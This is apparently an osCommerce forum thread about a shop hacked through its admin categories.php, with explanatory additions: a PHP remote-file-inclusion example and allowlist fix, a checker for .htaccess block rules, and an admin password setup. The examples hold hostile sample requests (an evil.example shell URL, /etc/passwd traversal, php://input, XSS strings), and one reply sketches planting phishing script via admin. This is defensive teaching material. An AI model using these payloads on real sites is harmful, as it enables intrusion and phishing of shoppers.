
Vulnerability in categories.php


simonjcook


My Web site was shut down yesterday by my hosting provider after a successful hacking attempt through categories.php.

 

"... your webspace was attacked via a security leak in your software. As a result of this attack, a phishing site had been uploaded and was to be found on your webspace."

 

I have implemented Security Pro, renamed the admin folder, deleted file_manager.php and define_language.php as per the following article:

http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-site/

 

I am running osCommerce v2.2 rc2a, that's as new as it gets without running the v3 alpha...

Are the osCommerce development team aware of the vulnerabilities and is there a fix in development?

 

Apparently the technique the hackers used was remote file inclusion.

http://en.wikipedia.org/wiki/Remote_File_Inclusion

 

Best regards,

 

Simon

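The technique named in the post above, as an added illustration that is not osCommerce code and says nothing about what categories.php itself does: a page router that hands a request parameter straight to include(), beside the allowlist version a hardened router uses. The file names in the PAGES map, the evil.example host and the sample requests are all assumptions constructed for the example.

```php
<?php
// Added example, not osCommerce code. Shows the remote file inclusion (RFI)
// pattern and the allowlist fix. Run with: php rfi_example.php
declare(strict_types=1);

// --- Vulnerable pattern ---------------------------------------------------
// The include path is built from user input. With allow_url_include=On an
// attacker sends ?page=http://evil.example/shell.txt and PHP fetches and
// executes the remote file as code; with URL includes off, ../ traversal
// and stream wrappers such as php://input remain reachable.
function vulnerable_include_path(string $page): string
{
    return $page . '.php';       // this string would go straight to include()
}

// --- Hardened pattern -----------------------------------------------------
// The parameter is only ever a key into a fixed map of files (assumed names).
// Anything not in the map is rejected, so no URL, traversal sequence or
// wrapper can reach include().
const PAGES = [
    'index'      => 'pages/index.php',
    'categories' => 'pages/categories.php',
    'contact'    => 'pages/contact.php',
];

function hardened_include_path(string $page): ?string
{
    if (!array_key_exists($page, PAGES)) {
        return null;             // caller answers 404; nothing is included
    }
    return __DIR__ . '/' . PAGES[$page];
}

// Constructed requests: one legitimate, three hostile.
$requests = [
    'categories',
    'http://evil.example/shell.txt',
    '../../../../etc/passwd',
    'php://input',
];

foreach ($requests as $page) {
    $v = vulnerable_include_path($page);
    $h = hardened_include_path($page) ?? '(rejected)';
    printf("%-32s vulnerable: %-40s hardened: %s\n", $page, $v, $h);
}
```

Two checks worth running on any PHP host after an incident like this one: `php -i | grep allow_url` should show allow_url_include Off (it has defaulted to Off since PHP 5.2, but hosts and old php.ini files override it), and every include()/require() whose path contains request data should be located with a grep for `include.*\$_` and converted to the allowlist form above.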


You need to do all the security snippets detailed in that thread, not just some of them. What's the point of locking the door but leaving windows open?

 

I would suspect your leak was through file_manager.php. What makes you think it was categories, and what evidence of that route was supplied?

 

Make sure you fully secure your admin; renaming is not sufficient. Also don't forget the other details given on preventing admin hacks.

Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.


Thanks Sam,

 

I appreciate your advice.

I will install SiteMonitor in due course.

I'm not planning to use IP trap at present.

I downloaded the htaccess zip file but couldn't figure out what to do with it once unzipped.

I was expecting individual files to drop into the appropriate folders to lock them down.

It looks like something I'd want to use.

I will install the anti XSS add-in in due course.

All files have permissions 644

All folders have permissions 755

I can't password protect the admin folder as there does not appear to be the facility.

 

The hosting provider highlighted categories.php as the source of the intrusion in their analysis of the incident.

"1.1 The intrusion was processed via your script/s:

./<path removed>/admin/categories.php"



If your admin is not password protected then clearly anyone can access any file they wish!!

 

Within your hosting cPanel select 'password protect directories', select your renamed admin folder and complete the process; hey presto, you have password protection!

 

The default text that you get on the osC install does tell you to do that!

 

It sounds like you need to read this: How do I install a contribution http://www.oscommerce.com/forums/index.php?showtopic=343384&st=0#entry1432157

Sam

 


Looks like the hacker and/or the host is stupid: if one can get into admin, or you allow anyone to get to admin, i.e. it is open to the world, then you don't need any sort of "exploit". Just edit a product and enter a script in the description saying, e.g., click to claim 50% discount... job done! Sit back and wait for the "fish" to come!

Ken

Commercial support - unProtected channel, not to be confused with the forum with the same name - open to everyone who needs some professional help: either PM/email me, or go to my website (URL can be found in my profile).

over 20 years of computer programming experience.


I found the password protection facility in my hosting control panel, thank you for your persistence in recommending that.

Can you see my screen?

 

I've implemented the anti-xss fix recommended in http://addons.oscommerce.com/info/6546 rather than http://addons.oscommerce.com/info/6044

 

Please see my comments here on the relative merits (11 Nov post, if link trouble).

Sam

 


Hi Sam,

 

What version of that XSS contribution do you suggest (by Date) as there are a few to choose from - eventually in suggesting the other XSS contribution.

 

Thanks

Now running on a fully modded, Mobile Friendly 2.3.4 Store with the Excellent MTS installed - See my profile for the mods installed ..... So much thanks for all the help given along the way by forum members.


As I also stated in that thread, I only use the htaccess parts of that contrib; it's called 'other version'.

Sam

 


The htaccess part of the anti-xss post is:

 

# 1) add these lines to your .htaccess file
# 2) create an index_error.php file with whatever content you want to be displayed.
#    The blocking rule as originally posted was "RewriteRule ^(.*)$ index_error.php [F,L]".
#    With the [F] flag Apache returns 403 and ignores the target, so index_error.php
#    was never shown; the target is therefore "-" and ErrorDocument 403 serves the
#    page instead (its path is relative to the web root).

Options +FollowSymLinks
RewriteEngine On
# Query strings to refuse: base64_encode(...), <script...>, <iframe...>, and attempts
# to inject GLOBALS or _REQUEST variables. [NC] makes a pattern case-insensitive;
# [OR] chains the conditions so any one of them triggers the rule.
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*iframe.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule .* - [F,L]
ErrorDocument 403 /index_error.php
# Refuse HTTP TRACE and TRACK (cross-site tracing).
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
RewriteRule .* - [F]

 

I'm pretty new to the use of .htaccess but from what I can see it controls the behaviour of what can happen in each folder in the web site structure.

Consequently this code needs to be added to the .htaccess file in every folder presumably?

Regarding the index_error.php page,

Do there need to be multiple copies of that file (one in every folder where the .htaccess file is located) or can they all point to a single location?

 

It begs the question why all these measures aren't bundled into the current osCommerce distribution?

My site got humped <14 days after putting osCommerce in, before that I had phpbb in place since 2004 and have never been hacked.

It seems pretty fundamental to me to build security into the package from the start, a release of osCommerce 2.2 rc3 perhaps, rather than patching it up afterwards?

Mind you, to partially answer my own question the data in phpbb3 does not include payment details.

This probably attracts hackers.

Bearing that in mind why have the osCommerce link at the bottom of the page?

I appreciate it's there to advertise the application but is also an instruction to any bot or spider on how to go about hacking the site.

 

Rambling on a bit more I noted that none of the tables in osCommerce have a prefix as phpbb does, i.e. phpbb_bbcodes.

This makes the database structure susceptible to accidental overwrites if you're installing other applications in the same database.

I appreciate that some would say keep the DBs separate, but some of us don't have that facility.

 

Grumbles aside I still think osCommerce is a pretty awesome application, it just needs a few tweaks and changes to make it a truly awesome application.

 

btw Sam - your avatar is from Baldur's Gate I believe?

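The five RewriteCond patterns quoted in the post above, carried over to PCRE as an added example (not part of the thread or of the anti-XSS contribution) so that you can see offline which raw query strings they block and which they let through. Apache tests QUERY_STRING before URL-decoding, so the samples are raw query strings; the sample requests and the evil.example host are constructed for the example.

```php
<?php
// Added example, not part of the thread or of the anti-XSS contribution.
// Mirrors the .htaccess RewriteCond patterns so their coverage can be
// checked without a web server. Run with: php htaccess_patterns.php
declare(strict_types=1);

const BLOCK_PATTERNS = [
    'base64'  => '/base64_encode.*\(.*\)/',           // case-sensitive
    'script'  => '/(<|%3C).*script.*(>|%3E)/i',       // [NC]
    'iframe'  => '/(<|%3C).*iframe.*(>|%3E)/i',       // [NC]
    'globals' => '/GLOBALS(=|\[|%[0-9A-Z]{0,2})/',
    'request' => '/_REQUEST(=|\[|%[0-9A-Z]{0,2})/',
];

// Name of the first rule that fires, or null if the request would reach PHP.
function blocked_by(string $queryString): ?string
{
    foreach (BLOCK_PATTERNS as $name => $re) {
        if (preg_match($re, $queryString) === 1) {
            return $name;
        }
    }
    return null;
}

// Constructed samples with the expected verdict: normal shop traffic, the
// attacks the rules were written for, and evasions that sail straight past.
$samples = [
    'cPath=22&products_id=3'                       => null,
    'search=%3Cscript%3Ealert(1)%3C/script%3E'     => 'script',
    'p=<iframe src=//evil.example></iframe>'       => 'iframe',
    'x=eval(base64_encode(foo))'                   => 'base64',
    'GLOBALS[foo]=bar'                             => 'globals',
    '_REQUEST[foo]=bar'                            => 'request',
    // Not caught: a remote file inclusion URL, the base64_decode() that real
    // webshell droppers use, PHP's case-insensitive function name, and an
    // XSS vector that contains neither "script" nor "iframe".
    'page=http://evil.example/shell.txt'           => null,
    'x=eval(base64_decode(foo))'                   => null,
    'x=eval(BASE64_ENCODE(foo))'                   => null,
    'q=<svg onload=alert(1)>'                      => null,
];

$mismatches = 0;
foreach ($samples as $qs => $expected) {
    $got = blocked_by($qs);
    $ok  = ($got === $expected);
    $mismatches += $ok ? 0 : 1;
    printf("%-48s -> %-8s %s\n", $qs, $got ?? 'pass', $ok ? '' : '(unexpected)');
}
exit($mismatches === 0 ? 0 : 1);
```

The last four samples are the practical caveat: a remote file inclusion request, the attack the host named, passes every one of these rules, as does the base64_decode() call that dropper payloads actually use. The rules are a speed bump against the crudest scanners; the fix is patching the vulnerable script, keeping allow_url_include off, and putting the admin behind authentication.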

 

 

Any htaccess file placed in the root will apply to all sub-dirs unless they contain a file with replacement rules.

 

Your error page would normally be in the root; you can set it with htaccess too.

 

 

ErrorDocument 404 /error.php

 

assumes error.php is your file in the root

 

Are you sure you are running rc2a? rc2a has admin login; only ms2 and earlier did not.

 

As I stated the default text that you get on the osc install does tell you to secure your admin!! You ignore such info at your own peril.

 

 

osC provides a basic framework for you to work on, but it's up to you to research what is needed for your site, and that includes security. It's not too hard; the answers are readily available here, it's just that too many can't be bothered to check!

 

 

I do get a little impatient with those that say "why isn't this or that done for me already?" It's free software with free support, so it's somewhat galling when some behave like it was a commercial package they bought! For anything to be added requires someone to give their time and expertise to do so; is it fair to insist 'they must/should have done this/that'?

 

 

Remember you must take responsibility for your site and your customers' data; any failure in that is not the fault of anyone else!

 

 

Sam

 


You misconstrue me Sam,

 

I have not demanded or insisted, I am merely expressing an opinion in an open forum.

I can't be the only person in the community who thinks that it would be a good idea to roll these security measures into a new release candidate package surely?

Especially when they seem so fundamental to improving the security of the application.

I have nothing but admiration for those that have better knowledge or experience than myself and am extremely grateful for any help rendered.

 

Back on topic,

I read up on .htaccess and found as you rightly said that it has an inheritance model.

So I've put the above code in the root of the oscommerce install (as you've suggested) and it should apply to all subfolders.

 

Indeed I am using version 2.2 rc2a.

It says on the download page that rc2a was released on 30th January 2008.

That's nearly 2 years without a security roll-up and new distribution or at least going from release candidate to a full release.

 

I asked for example code as I'm sure one of the community members has already done this and it seems pointless to re-invent the wheel.

 

Many thanks for your help :)


I'd agree it's a pity that fixes for known issues haven't been rolled up in to a further release since RC2.2a came out, but this is just to point out that the .htaccess you'll want to put in your catalog root is not the only .htaccess you'll probably want. You need to secure your admin, and it is recommended that this should be password protected. You won't want to password protect the front end of your store, so you need an additional and different .htaccess on the admin side.

www.jyoshna.com. Currently using osC with STS, Super Download Store, Categories Descriptions, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used!


Thanks Ben,

 

I've used the password protection facility my hosting service provides to lock down the admin folders so I'm covered there.

 

 

Just so you're clear, what that does is add an .htaccess file in your admin folder that requires the authentication; it uses a .htpasswd file placed elsewhere, so when you find that there, don't delete/replace it.

Sam

 

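What the control-panel tool described above produces, written out as an added example rather than the panel's or osCommerce's own file. It assumes the admin folder was renamed to backoffice, that the store lives at /home/example/public_html/catalog, and that the password file sits at /home/example/.htpasswd outside the web root; all three paths are assumptions to adjust for your host.

```apacheconf
# Added example: /home/example/public_html/catalog/backoffice/.htaccess
# (assumed paths; not the osCommerce distribution's file and not a copy of
# what any particular control panel writes).

AuthType Basic
AuthName "Store administration"
# Keep the password file outside the web root so it can never be served.
AuthUserFile /home/example/.htpasswd
Require valid-user

# Only needed if you also add mod_rewrite directives to this file: a
# per-directory RewriteEngine On here stops the catalog root's rewrite
# rules (the query-string filter) from applying to admin unless you opt in.
# RewriteEngine On
# RewriteOptions Inherit
```

Create the password file once from a shell on the host with `htpasswd -c -B /home/example/.htpasswd storeadmin` (-B selects bcrypt; on an Apache 2.2 host without it, use -m). Then check from outside: `curl -sI https://shop.example/backoffice/ | head -1` must return a 401, and the same request with `-u storeadmin:yourpassword` should get past to the osCommerce login page. Because the file is called .htpasswd, Apache's default `<FilesMatch "^\.ht">` rule refuses to serve it even if it ends up under the web root, but keeping it outside removes the dependency on that default.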

5 weeks later...

I'm working trying to get all the suggested security measures mentioned in place, but it seems like I run into a little something that confuses me on each one. I can understand item #1 about adding the 10 lines to the .htaccess, but still unclear about what to do with #2. Do I create a php file called index_error.php and just insert a string of text that says ErrorDocument 404 /error.php ?

 

 

All this is enough to give a newbie a headache. Why did I promise the wife to get her a website up? :)

